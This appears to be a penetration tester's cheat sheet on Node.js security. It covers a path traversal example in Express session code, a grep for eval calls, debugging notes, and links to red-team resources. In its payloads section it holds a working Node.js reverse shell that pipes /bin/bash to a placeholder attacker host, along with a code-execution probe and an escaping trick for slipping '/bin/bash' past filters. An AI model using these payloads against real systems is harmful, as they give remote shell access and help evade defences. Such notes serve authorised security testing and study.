Path Traversal
- https://koumudi-garikipati.medium.com/directory-traversal-in-express-js-55a8e852fb41 (Explains different types of sessions)
var path = require('path');

var options = helpers.defaults({
  path: process.argv[2], // path name is taken from the user
  ttl: process.argv[3]
});

sessionPath: function (options, sessionId) {
  // this leads to a path traversal vulnerability, as the path given by the user is directly appended
  return path.join(options.path, sessionId + options.fileExtension);
},
WTF JS
- https://github.com/denysdovhan/wtfjs
NodeJS Regex
grep -rnE '\beval\(' . --color  # \b anchors to the word eval; -w would miss eval(x), since grep -w rejects a match followed by a word character
# Payloads
require('util').log('CODE_EXECUTION');
# Reverse Shell (May require escaping in Python script)
var net = require("net"), sh = require("child_process").exec("/bin/bash");
var client = new net.Socket();
client.connect(80, "attackerip", function () {
  client.pipe(sh.stdin);
  sh.stdout.pipe(client);
  sh.stderr.pipe(client);
});
# Escaping Filters
cmd = "//bin//bash" --> cmd = "\\\\x2fbin\\\\x2fbash"
NodeJS Server Side Code Debugging
Remote Debugging (with .vscode/launch.json on server)
Via standard remote access:
- Modify IP address in launch.json to point to remote server
- Attach to directory and start debugging
Via CLI (port 9228):
docker-compose -f ~/chips/docker-compose.yml exec chips node --inspect=0.0.0.0:9228
- The benefit of debugging via the CLI is that we can now set breakpoints in individual libraries, load them in the interactive CLI, and run individual methods without making changes to the web application and reloading every time.
Other Resources
- https://github.com/aadityapurani/NodeJS-Red-Team-Cheat-Sheet
